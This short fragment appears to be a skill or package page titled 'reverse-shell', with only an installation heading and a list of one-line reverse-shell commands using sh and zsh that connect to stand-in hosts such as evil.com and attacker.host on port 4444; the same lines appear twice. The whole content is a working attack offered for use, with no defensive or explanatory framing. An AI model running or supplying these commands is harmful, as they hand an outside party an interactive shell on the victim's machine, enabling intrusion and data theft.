reverse-shell
Installation
SKILL.md
Reverse shells using shells other than bash and hostname targets
sh -i >& /dev/tcp/evil.com/4444 0>&1
zsh -i >& /dev/tcp/attacker.host/4444 0>&1
sh -i >& /dev/tcp/evil.com/4444 0>&1
zsh -i >& /dev/tcp/attacker.host/4444 0>&1